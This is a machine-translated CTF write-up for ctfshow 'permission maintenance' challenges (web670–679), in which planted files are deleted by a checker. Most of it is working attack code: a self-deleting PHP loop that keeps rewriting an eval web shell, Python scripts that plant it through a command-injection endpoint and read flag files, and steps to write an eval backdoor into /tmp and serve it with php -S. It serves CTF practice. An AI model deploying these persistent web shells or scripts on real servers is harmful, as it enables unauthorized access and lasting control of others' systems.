当前位置：网站首页>Ctfshow permission maintenance

Ctfshow permission maintenance

2022-06-30 22:48:00 【yu22x】

List of articles

web670-web676

Topic in progress check after , All files in the root directory of the website will be deleted .
Method 1
The following commands are used for forecasting

echo 'flag{xxxx}' > /flag_xx.txt
rm -rf *

rm -rf * In fact, there is a small defect , Cannot delete a file that begins with a dot , So you can use the Trojan horse to generate a .shell.php Of Trojans ,check It will be retained later .

Method 2
Use bounce shell
But the title is not out of the net , So this method cannot be considered for the time being .

Method 3
You can use the undead horse to write the Trojan horse into memory .

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = 'shell.php';
    $code = '<?php @eval($_POST[1]);?>';
    while (1) {
    
        file_put_contents($file, $code);
        usleep(5000);
    }
?>

Visit the undead horse , Trigger check, Then the ant sword connects shell.php You can get flag.
One click script

import requests
url="http://6143fdfc-94e3-4698-824f-f5da79a33081.challenge.ctf.show/"
data1={
    'cmd':"file_put_contents('a.php',\"<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);\\$file = 'shell.php';\\$code = '<?php @eval(\\$_POST[1]);?>';while (1) {file_put_contents(\\$file, \\$code);usleep(5000);}?>\");"}
r=requests.post(url+'?action=cmd',data=data1)
try:
	requests.get(url+'a.php',timeout=(1,1))
except:
	requests.get(url+'?action=check')
	r=requests.post(url+'shell.php',data={
    '1':'system("cat /f*");'})
	print(r.text)

web677、web678

It's a little different from the front , No write permission （ except /tmp Catalog ）
guess check It's about generating flag Then delete all /var/www/html The files under the .
So we can pass while The cycle continues to open flag, When check when , The page will appear flag.
payload
cmd=system('while true;do cat /tmp/f*;done');

web679

check It will be closed after nginx php-fpm Etc , But we can use it php Command to start a service directly
php -S 0.0.0.0:80, Which directory to run the command , Which directory is regarded as the root directory .
It's kind of like python Turn on web service
python -m SimpleHTTPServer 80
The general flow is as follows ：
1、/tmp The table of contents is writable , Generate Trojan files in this directory
cmd=system('cd /tmp;echo "<?php eval(\$_POST[1]);?>" > index.php');
2、 Turn on web service
cmd=system('cd /tmp;php -S 0.0.0.0:80');
3、 Trigger check
4、 Using Trojan horse
But in practical use, it will be found that , Manually opened web service check And then it will be stopped .
So we need to make sure that check Then turn it on web service , That is, add a delay .

import requests
url="http://b370b8d4-cdca-40dd-a3eb-6d6d4485965a.challenge.ctf.show/"

data1={
    'cmd':"system('cd /tmp;echo \"<?php eval(\$_POST[1]);?>\" > index.php');"}
r=requests.post(url+'?action=cmd',data=data1)


data2={
    'cmd':"system('sleep 3;cd /tmp;php -S 0.0.0.0:80');"}
try:
	requests.post(url+'?action=cmd',data=data2,timeout=(1,1))
except:
	requests.get(url+'?action=check')
	while True:
		r=requests.post(url,data={
    '1':'system("cat /f*");'})
		if "ctfshow{" in r.text:
			print(r.text)
			break